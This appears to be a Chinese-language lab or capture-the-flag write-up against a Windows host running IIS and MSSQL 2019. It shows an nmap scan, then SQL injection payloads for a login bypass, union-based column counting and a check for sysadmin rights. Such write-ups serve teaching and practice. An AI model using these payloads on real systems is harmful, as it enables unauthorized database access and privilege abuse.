命令:nmap -A -Pn 192.168.243.140
Nmap initial output
Nmap scan report for 192.168.243.140
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
**80/tcp open http Microsoft IIS httpd 10.0**
|_http-title: Music Inventory
| http-cookie-flags:
| /:
| ASPSESSIONIDASADDDCC:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
**1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM**
| ms-sql-ntlm-info:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: **SQL11**
| DNS_Domain_Name: sql11
| DNS_Computer_Name: sql11
|_ Product_Version: 10.0.17763
|_ssl-date: 2022-07-15T04:52:30+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-07-15T04:51:02
|_Not valid after: 2052-07-15T04:51:02
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: sql11
| DNS_Computer_Name: **sql11**
| Product_Version: 10.0.17763
|_ System_Time: 2022-07-15T04:52:23+00:00
| ssl-cert: Subject: commonName=sql11
| Not valid before: 2022-04-05T19:29:36
|_Not valid after: 2022-10-05T19:29:36
|_ssl-date: 2022-07-15T04:52:29+00:00; 0s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 192.168.243.140:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 192.168.243.141
2 204.78 ms 192.168.243.140
80端口开发,访问:
尝试登录绕过(注意是MSSQL),在Username处使用万能密码‘ or 1=1;-- -
尝试绕过登录,发现绕过登录成功。
登录绕过之后,发现存在查询,尝试sql注入。
查看查询有几项:
首先,尝试' union select 1;-- -
,出现500错误。
发现' union select 1,2;-- -
显示正常。
这样,可以得出结论:表项有两项。
接着来查看当前用户权限。判断是否为SA:is_srvrolemember('sysadmin')
这里使用命令如下:
' union select is_srvrolemember('sysadmin'),2;-- -
可以确定用户权限为SA。